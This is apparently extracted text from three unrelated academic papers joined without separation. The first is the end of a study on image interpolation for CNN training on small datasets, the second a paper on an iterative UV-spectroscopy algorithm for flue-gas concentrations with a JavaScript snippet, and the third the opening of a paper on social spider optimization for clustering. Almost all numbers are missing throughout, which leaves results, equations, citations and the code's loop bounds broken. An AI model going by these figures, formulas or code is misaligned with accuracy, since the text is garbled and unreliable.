lanczos (duchon, )). the nearest neighbor refers to and interpolates the brightness value of the pixel nearest to the reference position. in bilinear, luminance values are linearly interpolated using × pixels ( pixels) hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with , training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. /fig- in the vicinity of the position (x,y) to obtain luminance values and interpolate them. in bicubic, luminance values are obtained and interpolated by interpolating luminance values with a cubic formula using × pixels ( pixels) around the calculated position (x,y). hamming and lanczos are window functions, which, along with the han window, are among the most commonly used window functions. it has a better frequency resolution and a narrower dynamic range than the han window. characterized by discontinuities at both ends of the interval, the lanczos window is one of the many finite support approximations of the sinc filter. each interpolation value is a weighted sum of two consecutive input samples. for additional details about each method, refer to pillow’s documentation and original papers (lehmann, gonner & spitzer, ; harris, ; keys, ; duchon, ). in the fashion-mnist dataset investigation, the total number of coupling layers in the cnn was changed from to , when image interpolation was doubled and , when it was quadrupled. here, a small subset of images ( , , , , , , , , and , ) was constructed from , images such that the number of images per class was uniform. then, classification accuracy was obtained by identifying , images used as test data. the training and evaluation processed were each performed times. hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with , training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. /fig- in addition, it was compared with a conventional image data augmentation method, i.e., rotation and inversion. here, horizontal inversion and rotation of ± ◦ were applied randomly to a group of training images, and the training and evaluation processes were each performed times. for the gender dataset, the image size was reduced to × pixels by resizing. here, considering an image as an input to the training model, the number of fully-connected layers was changed from to , on doubling the resolution using five different pillow’s pixel interpolation methods and from to , on quadrupling the resolution. the gender dataset was examined with ten-fold cross-validation because the total number of datasets was only . results figure shows the results of training using pieces of data processed using the five image interpolation methods. with a mean classification accuracy of . for the training model in the source image, in which the image size was not expanded by the interpolation method, the average classification accuracy was improved for all models trained with image enlargement data using the pixel interpolation method. the method that most improved the hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . a c c u ra c y a. train size= , resolution= × nearest × nearest × bilinear hamming bicubic lanczos interpolation . . . . . . . . a c c u ra c y b. train size= , resolution= × figure accuracy obtained with , training data. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. /fig- classification accuracy was the two-fold magnification method with an average classification accuracy of . for the box and the four-fold magnification method with an average classification accuracy of . for the bilinear. the mean classification accuracy was improved by up to . over the training model for the source image. the results obtained with data counts of , , , , , , , and , are shown in figs. , , , , and , respectively. in all cases, the data obtained when the image was enlarged and trained were more accurate than the original data. figure shows the results of training by increasing the number of data by rotating and inverting the image. here, for comparison, the results of training using the data obtained by the bilinear image interpolation method are also shown in fig. . the minimum average classification accuracy when rotating and inverting the data augmentation was . when the number of training data was . the maximum average classification accuracy was . when the number of training data was , . the minimum mean classification accuracy on performing data augmentation using the bilinear image interpolation method was . for training data and an image size of × . the maximum average classification accuracy was . for , training data and an image size of × . hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. train size . . . . . . . . a c c u ra c y a. flip and rotate train size . . . . . . a c c u ra c y b. bilinear × train size . . . . . a c c u ra c y c. bilinear × figure comparison of the classification accuracy between training models of data augmentation us- ing rotation and inversion and image augmentation using bilinear. (a) data augmentation by rotation and inversion, (b) bilinear × , (c) bilinear × . full-size doi: . /peerjcs. /fig- finally, the medical image results are shown in fig. . here, the average accuracy of × pixels was . , and the average accuracy of × pixels . to . . by doubling interpolation, the average accuracy improved by . to . . at × pixels, the average accuracy was . to . , which is an improvement of . to . with four-fold interpolation. at × pixels, the minimum accuracy was . , which was . less than the average. here, the minimum accuracy was . when the image was enlarged, which resulted in stability. discussion the obtained results demonstrate that as the number of image data used for training increases, the features of images that can be extracted by cnn also increases and the effect of increasing the features obtained by image interpolation decreases. from these results, it is considered that the effect of image interpolation is high even if the number of data used for training is small. although the wu et al. study is also due to color images, the true class is out of the top five predictions when models trained on × low-resolution images are used. hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. nearest × nearest × box bilinear hamming bicubic lanczos interpolation . . . . . . . . a c c u ra c y a. resolution= × nearest × nearest × box bilinear hamming bicubic lanczos interpolation . . . . . . . . a c c u ra c y b. resolution= × figure accuracy of chest radiograph gender classification dataset. (a) × pixels; (b) × pixels. full-size doi: . /peerjcs. /fig- high-resolution training at × captured more features of the predicted target and showed that it recognized images in second place (wu et al., ). moreover, by comparing two- and four-fold interpolations, we found that high accuracy was obtained with four-fold interpolation even if the number of data is less than , . however, if the number of data exceeded , , two-fold interpolation provided higher accuracy than the four-fold interpolation. although image data interpolation increased the feature value, effective information was not always generated by the interpolation process. thus, to improve the accuracy further, we consider that it is insufficient to only increase the feature value. in other words, the quality of the data must also be improved. this result demonstrates that when the number of data is large, unimportant information is included, which results in an inverse effect because many feature values are increased by the algorithm in the four-fold interpolation. from the results obtained using data augmentation by image inversion, image rotation, and image interpolation, we found that when there are many normal images in the original image data, the information created by these procedures does not function as valid data. thus, even though the number of data increases, the increased amount of data does not hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. result in improved accuracy. in addition, the accuracy improvement obtained using image interpolation was remarkable when the number of data was small; thus, we consider that image interpolation is an effective method to improve accuracy compared with the conventional method, i.e., rotation and inversion. conclusions in this paper, we investigated the effect of using interpolated image sizes for training data on the classification accuracy using five image interpolation methods on monochrome and low-quality fashion image data. for all methods, we confirmed that image interpolation combined with interpolation improved the accuracy and demonstrated that this approach was particularly effective with small amounts of data. for example, when the number of data was small, four-fold interpolation was effective, however, as the number data increased, two-fold interpolation demonstrated higher accuracy. furthermore, image interpolation was more accurate than data augmentation by rotation and inversion operations of the conventional method. thus, even though there is an optimal value for the increased image size, it can be considered that image interpolation is a more useful preprocessing technology than rotation and inversion operations. we expect that these results will have practical implications in image preprocessing technology in the medical field, where only a small amount of low-resolution data can be obtained. the proposed method is a preprocessing method that can be used by medical specialists without requiring machine learning technology. in addition, image classification can be further improved by utilizing the expertise on images. finally, we expect that the proposed method will contribute to the development of medical image classification technology by fusing medical specialist expertise and easy-to-use image interpolation preprocessing technology. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • daisuke hirahara conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • eichi takaya conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • taro takahara and takuya ueda analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the code used for the study is available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bakkouri i, afdel k. . multi-scale cnn based on region proposals for efficient breast abnormality recognition. multimedia tools and applications : – doi . /s - - -z. duchon ce. . lanczos filtering in one and two dimensions. journal of applied meteorology ( ): – doi . / - ( ) < :lfioat> . .co; . harris fj. . on the use of windows for harmonic analysis with the discrete fourier transform. proceedings of the ieee ( ): – doi . /proc. . . hendrycks d, mu n, cubuk ed, zoph b, glimer j, lakshminarayanan b. . augmix: a simple data processing method to improve robustness and uncertainty. in: proceedings of the international conference on learning representations. hijazi s, kumar r, rowen c. . using convolutional neural networks for image recognition. san jose: cadence design systems inc., – . keys r. . cubic convolution interpolation for digital image processing. ieee transactions on acoustics, speech, and signal processing ( ): – doi . /tassp. . . kyono t, gilbert fj, van der schaar m. . improving workflow efficiency for mammography using machine learning. journal of the american college of radiology ( ): – doi . /j.jacr. . . . lehmann tm, gonner c, spitzer k. . survey: interpolation methods in medical image processing. ieee transactions on medical imaging ( ): – doi . / . . poplin r, varadarajan av, blumer k, liu y, mcconnell mv, corrado gs, peng l, webster dr. . prediction of cardiovascular risk factors from retinal fundus photographs via deep learning. nature biomedical engineering ( ): – doi . /s - - - . samanta a, saha a, satapathy sc, fernandes sl, zhang y-d. . automated detection of diabetic retinopathy using convolutional neural networks on a small dataset. pattern recognition letters : – doi . /j.patrec. . . . shiraishi j, katsuragawa s, ikezoe j, matsumoto t, kobayashi t, komatsu k, matsui m, fujita h, kodera y, doi k. . development of a digital image database for chest radiographs with and without a lung nodule: receiver operating characteristic analysis of radiologists’ detection of pulmonary nodules. american journal of roentgenology : – doi . /ajr. . . . hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . / - ( ) < :lfioat> . .co; http://dx.doi.org/ . /proc. . http://dx.doi.org/ . /tassp. . http://dx.doi.org/ . /j.jacr. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /ajr. . . http://dx.doi.org/ . /peerj-cs. wu r, yan shengen, shan y, dang q, sun g. . deep image: scaling up image recognition. arxiv preprint. arxiv: . . xiao h, rasul k, vollgraf r. . fashion-mnist: a novel image dataset for bench- marking machine learning algorithms. arxiv preprint. arxiv: . . zhang h, cisse m, dauphin yn, lopez-paz d. . mixup: beyond empirical risk min- imization. in: proceedings of the international conference on learning representations. zhong z, zheng l, kang g, li s, yang y. . random erasing data augmentation. proceedings of the aaai conference on artificial intelligence: proceedings of the thirtieth aaai conference on artificial intelligence ( ): – doi . /aaai.v i . . zhou x, takayama r, wang s, hara t, fujita h. . deep learning of the sectional appearances of d ct images for anatomical structure segmentation based on an fcn voting method. medical physics ( ): – doi . /mp. . hirahara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /aaai.v i . http://dx.doi.org/ . /mp. http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , the researchof a new iteration of the circular algorithm xu shuping school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com huang menyao school of computer science and engineering xi’an technological university xi’an, , china chen li school of computer science and engineering xi’an technological university xi’an, , china xu pei school of computer science and engineering xi’an technological university xi’an, , china abstract—it is a problem of spectra analysis of flue gas that how to separate and calculate the concentration of different kinds of gas from continuous mixed gas absorption spectrum signal. so based on experimental data, a new iteration of the circular algorithm is put forward on the basis of lambert-beer's law. the algorithm uses different uv-light wavelengths at nm- nm for different characteristics of uv light with different absorption peaks. the iteration is repeated until the concentration difference between adjacent two gases is less than a certain value. it is considered that the elemental gas the exact concentration, and through the programming to achieve the results. it has strong anti-jamming capability and is suitable for practical application of engineering. keywords—circular iteration; characteristic absorption peak; iterative algorithm; gas concentration i. introduction with the industrial production, centralized heating of boilers and the popularization of transportation tools, a large number of soot and toxic and harmful gases will be discharged. hazardous substances accumulate gradually in the atmosphere and reach a certain concentration, which will make the normal composition of air change, thus endangering the health of human beings and various animals and plants. various problems caused by air pollution have attracted the attention of environmental protection departments . in order to achieve accurate and real-time monitoring of environmental quality, ecological environment and pollution sources, and provide accurate basis for supervision and management of environmental protection departments at all levels and environmental decision-making of the government, a large number of modern environmental monitoring instruments are urgently needed. at present, there are three main methods for gas detection of portable spectrometers in domestic and foreign markets: differential algorithm, electrochemical analysis and infrared spectroscopy. differential absorption algorithm can accurately calculate the concentration of most gases, but it will lose the broadband continuous absorption information in the characteristic absorption of gases, leading to some gas concentration measurement can not come out. for example, the absorption spectrum of nitrogen dioxide molecule in the ultraviolet band is mostly gradual continuous absorption, so differential absorption algorithm may think that the absorption information of nitrogen dioxide is filtered out by scattering, resulting in the detection of nitrogen dioxide. if the absorption curves of nitric oxide and nitrogen dioxide have the same absorption peaks, the fitting absorption curves are superimposed at the measuring points, so it is still impossible to distinguish the two gases. the electrochemical analysis method has the advantages of simple structure and easy operation. it mainly depends on gas sensors, a gas sensor can only detect a corresponding gas, and the sensitivity of gas sensors is high, but after a period of time, the sensitivity of sensors to gas will decline, it is necessary to replace gas sensors in time, and gas sensors are expensive, which increases the use cost for users. the main principle of gas sensor is to use the oxidation or reduction reaction of gas to generate current, but if there are both oxidizing gas and reducing gas, the measurement results will be inaccurate . infrared spectroscopy overcomes the shortcomings of doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , electrochemical analysis, but can only measure the approximate concentration of nitrogen oxides, can not accurately measure the specific concentration of no and no , and infrared spectroscopy for environmental humidity, temperature and other external conditions require higher technology is more complex . based on defects and deficiencies of the above gas detection methods, an iterative evolution gas solution algorithm is proposed in this paper. according to the good absorption of ultraviolet light by gas at the wavelength of - nm, the number of absorbed photons can be obtained by measuring the ultraviolet light absorbed by gas. the actual concentration of gas can be obtained from the number of photons by using the iterative gas calculation algorithm. ii. the pinciple and computational procedure of iterative algorithms a. algorithm principle mixed gases have characteristic absorption peaks in the range of ultraviolet wavelength - nm. gas absorbance has multiple superposition. assuming that some elementary gas does not absorb other gases on its best characteristic absorption peak, the corresponding table of absorbance and concentration of this single substance gas is searched to obtain the initial concentration of the gas, and then switch to another characteristic absorption peak. the photon number of the gas is subtracted from the total photon number measured, and the initial concentration of another gas is obtained. by analogy, the initial concentration of each gas is obtained one by one. then, the characteristic absorption peak of the first gas is returned to, and the absorption photon number of other gases is subtracted from the total photon number absorbed, and the iterative concentration of the first gas is obtained again. by analogy, the initial concentration of each elemental gas is obtained again. by repeating the iteration until the difference of gas concentration between two adjacent times is less than a certain value, it is considered that the concentration of the elemental gas is obtained. b. algorithm steps ) the initial concentration c of the first elementary gas in the mixed gas is solved. according to the characteristic absorption peak of the gas at wavelength  , the number of photons b s absorbed by the gas is read.solving the value of   ds dr   ( r is the number of incident photons; s is the number of photons passing through the medium.; d is the number of photons in dark spectrum(also known as dark spectral noise);  is the wavelength of a certain ultraviolet wave, k is a constant, c is the concentration of elemental gas),the initial concentration c of the elemental gas was obtained by inquiring the comparison table of absorbance and gas concentration.. ) the initial concentration c of the second primary gas in the mixed gas is solved. too, select the characteristic absorption peak  of the elemental gas and read the absorption photon number s of the elemental gas.assuming that there are only two gases in this band, according to the formula        ds dr ds dr ds dr        *   the absorbance of the second gas is calculated, and the concentration of the second gas is calculated by querying the absorbance and concentration table again, as the initial concentration c of the second gas. ) solve the concentration of other elemental gases in mixed gases. methods and . selecting the characteristic peak absorption wavelength of other elemental gases and reading the number of absorbed photons at that wavelength.the absorbance was calculated by formula            ds dr ds dr ds dr ds dr ds dr a n n             *...***   ( a is absorbance), and the initial concentration of gas was obtained by looking up the table. ) iterative recursion of the concentration of the first element gas.the concentration of all elemental gases obtained at present is substituted into the formula            ds dr ds dr ds dr ds dr ds dr n n               ...   and the corresponding s of wavelength  is read again. the iterative concentration c of the first elemental gas is obtained by checking the corresponding table of concentration absorbance. ) repeat ) and ) to find the iteration concentration mc of the elemental gas m. international journal of advanced network, monitoring and controls volume , no. , ) calculate the error of the calculation results of the same elemental gas in the adjacent two times. the first-order iteration error of each elemental gas is calculated.  mmm cc    ) repeat , and until the error of two iterations of the same gas concentration is less than %.  gn    the last calculated gas concentration is regarded as the final concentration of various elemental gases. iii. algorithm verification figure . mixed gas uv spectral absorption curve fig. is the absorption spectra of no , so nh and no mixed gases. among them, n is a zero gas whose spectral line is called zero gas line. zero gas is not absorbed in ultraviolet light of - nm. because there is rayleigh scattering in the gas to be detected, the influence of scattering can be eliminated by using the zero-gas line spectrum as the reference spectrum. from the observation in fig. , we can see that no and nh can find non-interference absorption wavelengths. these two wavelengths are just the absorption peaks of no and nh , and there is no no absorption at the nh absorption peak, and there is no nh absorption at the no absorption peak. so it is easy to distinguish the two gases if we only distinguish them.the problem now is that so and no both absorb at the absorption peaks of these two gases. at the wavelength of nm, the maximum absorption peaks of no and no are close, and so absorbs a lot of ultraviolet light in this section.so if we can know the concentration of so and no beforehand, we can use the superposition of absorbance to subtract the absorbance of no and nh from the total absorbance of so and no . we can get the absorbance of no and nh by looking up tables.therefore, in order to obtain the specific concentration of various elemental gases in mixed gases, the concentration of so and no must be required first, and then the concentration of no and nh can be calculated. in this way, the concentration of four kinds of elemental gases in the mixture can be calculated. a. calculating the concentrations of so and no no and so interfere with each other in the whole working band. now it is assumed that there are two kinds of elemental gases in the mixture, no and so , respectively. it is now known that the absorption spectra of mixed gases at . nm and . nm, and the absorbance of gases no and so at . nm and . nm ( . nm and . nm, respectively, are the maximum absorbance of gases no and so at this point). now calculate the respective concentrations of no and so . figure . absorption spectra of so and no table i. spectral tables for so and no at wavelength . nm and wavelength . nm wavelength . . no absorbance . . so absorbance . . international journal of advanced network, monitoring and controls volume , no. , figure . no and so gas concentration iterative algorithm flow chart fig. is the flow chart of the iterative algorithm for the concentration of no and so mixed gases. after several iterations, the real concentrations of these two gases can be calculated from the mixture. figure . so concentration and the number of iterations curve figure . no concentration and the number of iterations curve after two iterations, the numerical value of the algorithm tends to be stable, and the precise gas concentrations of no and so are basically obtained. b. calculating the gas concentrations of no and nh there is no interference between no and nh at their maximum absorption peaks, so the total absorbance and the concentration of no and so can be calculated according to the superposition of ultraviolet light. assuming that the concentrations of no and so in mixed gases are c and c , respectively, and the concentrations of no and nh are c and c , the multivariate superposition of absorbance at wavelength . nm can be obtained as follows:  aaaa    a is the absorbance of no at . nm in c concentration, a is the absorbance of so at . nm in c concentration, a is the total absorbance of mixed gas at . nm and a is the total absorbance of no at . nm.  lg( ) i i a a a a a a        i is the spectral intensity at . nm through zero gas, i is the transmission intensity at . nm through the mixture gas to be measured, the intensity can be obtained directly by spectrometer, a and a are calculated by the concentration of so and no . in this way, the absorbance a of no at . nm can be obtained, and then the concentration of no can be calculated according to the corresponding table between the concentration of no at . nm and the absorbance. the absorbance international journal of advanced network, monitoring and controls volume , no. , a of nh can be obtained by the same method at . nm, and the concentration of nh can be calculated according to the corresponding relationship between nh concentration and absorbance at . nm. c. composition of platform experiment system ultraviolet flue gas analyzer consists of three parts: flue gas data acquisition module, data processing module and data display module. figure . experimental system composition diagram the data acquisition module is composed of ultraviolet light source and marine optical maya pro ultraviolet spectrometer. ultraviolet light source outputs stable ultraviolet light. ultraviolet light passes through the optical fiber through the detected gas. after the gas is fully absorbed, the remaining ultraviolet light is transmitted into the ultraviolet spectrometer by the optical fiber. after the optical processing and photoelectric conversion of the gas by the spectrometer, the gas information becomes an electrical signal, waiting for the data processing module to read. in this system, the ultraviolet spectrometer is actually a flue gas acquisition sensor. data processing module is composed of embedded development board. the embedded development board reads the gas information from the ultraviolet spectrometer, calculates the actual concentration of the elemental gas through the iterative algorithm, and visualizes it through the data display module. this is the composition and working principle of the experimental system. d. absorption spectroscopy of elemental gas and zero gas n is introduced into the system, and its absorption spectrum is measured when the gas concentration is stable. after that, the number of photons absorbed by no , no , so and nh gases was measured in turn, and the curve was drawn by using the number and wavelength of photons. figure . four gas photon spectrum line graph e. data verification the following data are obtained when a mixture of so and no is injected into the experimental system. table ii. ppm so and no gas spectral data . nm . nm dark noise zero gas so ppm zero gas no ppm table shows the number of absorbed photons and dark noise photons at . and . nm measured by ultraviolet spectrometer in a mixture of so and no at ppm, respectively. table iii. spectral data for mixed gas . nm . nm dark noise zero gas mixed gas table shows the number of absorbable photons at . nm and . nm for zero and mixed gases, as well as the number of dark spectral noise photons measured by spectrometer. in practical calculation, the number of photons measured should be subtracted from the number of photons of dark spectral noise to obtain the actual number of photons of zero gas and mixed gas. based on the above data, the photon number absorption curves of elemental gases at their maximum absorption peaks are fitted. international journal of advanced network, monitoring and controls volume , no. , figure . fitting curve of so at . nm figure . fitting curve of no at . nm figure . fitting curve of no at . nm figure . fitting curve of nh at . nm figure - is a curve drawn by a single gas at the maximum absorption wavelength of ultraviolet light. analysis table of experimental results table iv. analysis of results gas species standard value (ppm) measured value (ppm) difference value maximum difference error so - . % - no - . % - no - - . . % . - . . - . nh . % - conclusion accuracy error is less than %, which meets the design standard. in table , the standard value is the concentration of the standard elemental gas put in the test, and the measured value is the concentration of the elemental gas calculated from the mixed gas using an iterative algorithm. from the experimental results, it can be seen that the maximum error of the measured value is less than the standard value, and the maximum error of the accuracy is . %, which is much less than the original design standard of %, which is within the normal standard. iv. software implementation the software algorithm is written in javascript, including the analysis and implementation process of the iterative algorithm gas. the main code is as follows: /* *iterative calculation of gas concentration */ function getgasc() { // . obtain absorbance from no var no a_ = getabywa(gaswavebanc['no ']); // . find the concentration of this point var no c_ , no a_ , so a_ , so c_ , so a_ , ona_ , nh a_ , onc_ , nh c_ ; for(var i = ; i < ; i++) { no c_ =getcbya_data(no _data_ , no a_ ); // .calculate the absorbance of no at . . //no a_ ; no a_ = getabyc_data(no _data_ , no c_ ); international journal of advanced network, monitoring and controls volume , no. , // . obtain the total absorbance of so in the optimum band and subtract the absorbance of no here. so a_ =getabywa(gaswavebanc["so "]) -no a_ ; // . looking up table to find deso c_ so c_ = getcbya_data(so _data_ , so a_ ); // . the absorbance of so at . was obtained by //looking up the table. so a_ = getabyc_data(so _data_ , so c_ ); // . no a_ is the total absorbance minus the //absorbance of so a_ at . . no a_ = no a_ - so a_ ; } currentgasc_no = no c_ ; currentgasc_so = so c_ ; //the absorbance of no at the optimum band is the //total absorbance s-so absorbance minus the //absorbance of no . ona_ = getabywa(gaswavebanc["no"]) - getabyc_data(no _data_ , no c_ ) - getabyc_data(so _data_ , so c_ ); //concentration of no obtained currentgasc_no = getcbya_data(no_data_ , ona_ ); nh a_ = getabywa(gaswavebanc["nh "]) - getabyc_data(no _data_ , no c_ ) - getabyc_data(so _data_ , so c_ ); currentgasc_nh = getcbya_data(nh _data_ , nh a_ ); $("#no _c").html("no " + currentgasc_no ); $("#so _c").html("so " + currentgasc_so ); $("#no_c").html("no " + currentgasc_no); $("#nh _c").html("nh " + currentgasc_nh ); } v. conclusion aiming at the detection requirement of main harmful components in air pollution, a fast iteration algorithm of mixed flue gas is designed by using the continuous frequency division method of ultraviolet grating in the experimental system, and the effectiveness of the algorithm is verified. ultraviolet spectrometer is used as a sensor. the embedded development board reads and calculates the gas concentration. the analysis and calculation of the algorithm are realized by programming. the results show that the iterative algorithm can accurately measure the concentration of flue gas and keep the error within %. it can meet the design requirements and solve many kinds of gases at the same time. it is suitable for practical engineering applications. acknowledgment thank you, shaanxi education department. this work was supported in part by a grant from shaanxi provincial department of education project ( jf ). the authors wish to thank the cooperators. this research is partially funded by the project funds in shanxi province department of education ( jf ), a the project funds in engineering laboratory project (gsysj ) and the project funds in innovation and entrepreneurship training for college students ( ) about the author xu shuping ( -), female, professor, school of computer science and engineering, xi'an technological university, majoring in embedded and computer control. email: @qq.com, mobile: . references [ ] chen zhi-gang. discussion on experimental application of lambert-beer law[j]. acta metrologica sinica. ( ) [ ] pop,paul. embedded systems design:optimization challenges.lecture notes in computerscience, , ( ): - [ ] shi bao-song sun shou-hong zhang wei. application of ccd in the portable spectrometer[j]. electronic measurement technology. ( ) [ ] limited arm development guide - .arm doi. . . [ ] tang qu. “research and design of ultraviolet flue gas analyzer [j]”. nanjing university of technology. [ ] jiang xuqian. “design of portable ultraviolet flue gas analyzer [j]”. nanjing university of technology. [ ] chen bin. “design of ultraviolet flue gas analyzer [j]”.nanjing university of technology. [ ] juwu ,wu yihui. micro-miniaturization of spectrometer [j]. journal of instrumentation, . ( ): - [ ] yu zhiqiang, wenzhi yu, xie yingke, zhou suyi. the control system of multi-parameter water quality tester based on raspberry pie [j]. instrumentation technology and sensors, ( ): - . [ ] han xiao, wenzhi yu, xie yingke, wei kanglin, zhou xiaofeng. software design of control and signal processing system for multi-parameter water quality tester [j]. instrumentation technology and sensors, ( ): - a novel variant of social spider optimization using single centroid representation and enhanced mating for data clustering a novel variant of social spider optimization using single centroid representation and enhanced mating for data clustering ravichandran thalamala, janet barnabas and a.v. reddy department of computer applications, national institute of technology, trichy, india abstract nature-inspired algorithms are based on the concepts of self-organization and complex biological systems. they have been designed by researchers and scientists to solve complex problems in various environmental situations by observing how naturally occurring phenomena behave. the introduction of nature-inspired algorithms has led to new branches of study such as neural networks, swarm intelligence, evolutionary computation, and artificial immune systems. particle swarm optimization (pso), social spider optimization (sso), and other nature-inspired algorithms have found some success in solving clustering problems but they may converge to local optima due to the lack of balance between exploration and exploitation. in this paper, we propose a novel implementation of sso, namely social spider optimization for data clustering using single centroid representation and enhanced mating operation (ssodcsc) in order to improve the balance between exploration and exploitation. in ssodcsc, we implemented each spider as a collection of a centroid and the data instances close to it. we allowed non-dominant male spiders to mate with female spiders by converting them into dominant males. we found that ssodcsc produces better values for the sum of intra-cluster distances, the average cpu time per iteration (in seconds), accuracy, the f-measure, and the average silhouette coefficient as compared with the k-means and other nature-inspired techniques. when the proposed algorithm is compared with other nature-inspired algorithms with respect to patent corpus datasets, the overall percentage increase in the accuracy is approximately %. when it is compared with other nature-inspired algorithms with respect to uci datasets, the overall percentage increase in the f-measure value is approximately %. for completeness, the best k cluster centroids (the best k spiders) returned by ssodcsc were specified. to show the significance of the proposed algorithm, we conducted a one-way anova test on the accuracy values and the f-measure values returned by the clustering algorithms. subjects agents and multi-agent systems, artificial intelligence, data mining and machine learning keywords social spider optimization, nature inspired algorithms, swarm intelligence, single cluster approach, data clustering, cluster centroids introduction data clustering is one of the most popular unsupervised classification techniques in data mining. it rearranges the given data instances into groups such that the similar data how to cite this article thalamala r, barnabas j, reddy av. . a novel variant of social spider optimization using single centroid representation and enhanced mating for data clustering. peerj comput. sci. :e doi . /peerj-cs. submitted february accepted june published july corresponding author ravichandran thalamala, sirichandran @gmail.com academic editor yilun shang additional information and declarations can be found on page doi . /peerj-cs. copyright thalamala et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:sirichandran @�gmail.�com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ instances are placed in the same group while the dissimilar data instances are placed in separate groups (bernábe-loranca et al., ). data clustering identifies the groups present in a data set, each of which contains related data instances. network clustering identifies the groups present in a computer network, each of which contains highly connected computers. network clustering returns the various topological structures present in a computer network as shown in fig. , whereas data clustering returns cluster sets of related data instances. the quality of data clustering is measured using metrics like intra-cluster distances (icd), inter-cluster distances, f-measure, and accuracy. the quality of network clustering is measured using metrics like the global clustering coefficient and the average of the local clustering coefficients. data clustering is an np-hard problem (aloise et al., ) with the objective of minimizing icd within the clusters and maximizing inter-cluster distances across the clusters (steinley, ). a dataset ds is a collection of data instances. each data instance in a dataset ds can be represented by a data vector. in a dataset of text files, each text file is a data instance and can be represented as a data vector using mechanisms like term frequency-inverse document frequency (tf-idf) (beil, ester & xu, ). in this paper, we use the terms “data instance” and “data vector” interchangeably and define clustering as a minimization problem that minimizes the sum of intra-cluster distances (sicd). clustering forms a set of k clusters. let cl be the set of k clusters where the sicd is figure topological structures present in a computer network: network clustering. it specifies the resultant topological structures of the network clustering when applied on a computer network. full-size doi: . /peerj-cs. /fig- thalamala et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ minimized. the mathematical model for the clustering problem can be defined as shown in eq. ( ). the clustering function f takes ds and returns cl after minimizing sicd. minimize f ds; clð Þ ¼ xk i¼ xni j¼ distanceðci; dvi;jÞ ( ) in eq. ( ), distance is the distance function that returns the distance between two given data vectors, dvi, j is the jth data vector present in ith cluster of cl, ni is the number of data vectors present in ith cluster of cl, and ci is the centroid of ith cluster of cl. the classical clustering algorithms are categorized into hierarchical and partitional algorithms. the main drawback of hierarchical clustering is that the clusters formed in an iteration cannot be undone in the next iterations (rani & rohil, ). k-means is one of the simplest partitional algorithms (mihai & mocanu, ) but it has two drawbacks: the number of clusters to be formed should be specified apriori, and it generally produces local optima solutions due to its high dependency on initial centroids. examples of other classical clustering algorithms are birch (zhang, ramakrishnan & livny, ), cure (guha, rastogi & shim, ), clarans (ng & han, ), and chameleon (karypis, han & kumar, ). classical algorithms suffer from the drawbacks like the convergence to local optima, sensitivity to initialization, and a higher computational effort to reach global optimum. in order to overcome these problems, nature-inspired meta heuristic algorithms are now used for data clustering. in this study, we investigated the performance of social spider optimization (sso) for data clustering using a single centroid representation and enhanced mating operation. the algorithm was experimented on using the patent corpus datasets and uci datasets. each data instance in the uci dataset is a data vector but the data instances in the patent corpus datasets are text files. before we apply the proposed algorithm on these datasets, the text files were represented as data vectors using tf-idf mechanism. the vector representation of ith data instance dvi present in the dataset ds can be specified using eq. ( ). dvi ¼ wi; ; wi; ; wi; ; . . . . . . :; wi; t � � ( ) in eq. ( ), wi, j is the term weight of jth distinguishable term of the dataset ds in the ith data instance, t is the total number of distinguishable terms in the dataset ds. the term weight wi, j can be computed using 